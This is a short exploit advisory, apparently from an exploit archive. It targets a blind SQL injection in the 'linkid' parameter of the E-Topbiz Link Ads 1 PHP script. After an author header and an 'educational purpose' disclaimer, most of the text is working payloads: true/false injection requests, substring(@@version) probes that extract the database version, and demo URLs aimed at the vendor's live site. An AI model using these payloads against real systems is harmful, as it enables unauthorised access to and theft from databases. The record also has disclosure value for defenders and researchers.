E-Topbiz Link Ads 1 PHP script suffers from a remote SQL injection vulnerability.
f50a97f705d7d4db462b3f69d05d76e5985ca1a522d45750cd8aad38ec8575ea
# E-topbiz Link ADS 1 PHP script (linkid) Blind SQL Injection Vulnerability
# url: http://e-topbiz.com/oprema/pages/linkads1.php
#
# Author: Jose Luis Gongora Fernandez 'aka' JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://hack0wn.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers!
proof of concept:
GET /out.php?linkid=50+and+1=1 (true)
GET /out.php?linkid=50+and+1=2 (false)
exploit :
GET /out.php?linkid=50+and+substring(@@version,1,1)=4
GET /out.php?linkid=50+and+substring(@@version,1,1)=5
demo:
http://e-topbiz.com/trafficdemos/linkads1/out.php?linkid=50'
http://e-topbiz.com/trafficdemos/linkads1/out.php?linkid=50+and+substring(@@version,1,1)=4
http://e-topbiz.com/trafficdemos/linkads1/out.php?linkid=50+and+substring(@@version,1,1)=5
# _h0_